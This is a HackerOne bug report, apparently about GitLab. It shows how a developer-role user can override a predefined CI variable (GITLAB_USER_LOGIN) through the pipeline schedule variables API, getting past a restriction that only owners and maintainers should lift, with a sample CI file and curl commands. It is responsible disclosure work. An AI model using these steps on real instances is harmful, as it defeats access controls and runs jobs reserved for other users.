Bypass predefined vars
HackerOne report #2125189 by ali_shehab
on 2023-08-27, assigned to @rshambhuni:
Report
Summary
Hi team. An admin can set that only maintainer and owner can bypass predefined variables. If you put it to true, when a developer tries to override manually he will get an error, however, this is bypassable by rest API
Steps to reproduce
- Create a group and a project in the group.
- Add this .gitlab-ci.yaml file to the project and lock this file.
stages:
- build
- owner-only
build:
stage: build
image: ubuntu
script:
- echo "This is a normal job..."
owner-only:
stage: owner-only
image: ubuntu
script:
- echo "This should only run is the pipeline was triggered by ali_shehab"
rules:
- if: '$GITLAB_USER_LOGIN == "ali_shehab"'
- This means that owner-only job will only be triggered if the pipeline trigger is ali_shehab.
- Disable overriding variables:
curl -X PUT -H "PRIVATE-TOKEN: TOKEN" "https://gitlab-private.net/api/v4/projects/16?restrict_user_defined_variables=true"
- Now invite user B with a developer role.
- Now user B create a schedule pipeline.
- He send this api request to add variables to the schedule pipeline.
curl --request POST --header "PRIVATE-TOKEN: TOKEN" "https://gitlab.com/api/v4/projects/{project}/pipeline_schedules/{pipeline_scheduleus}/variables?key=GITLAB_USER_LOGIN&value=ali_shehab"
- Now he run the schedule and he overrides the prededined vars.
Impact
Able to bypass predefined variables even if only the maintainer and developers are allowed.
How To Reproduce
Please add reproducibility information to this section: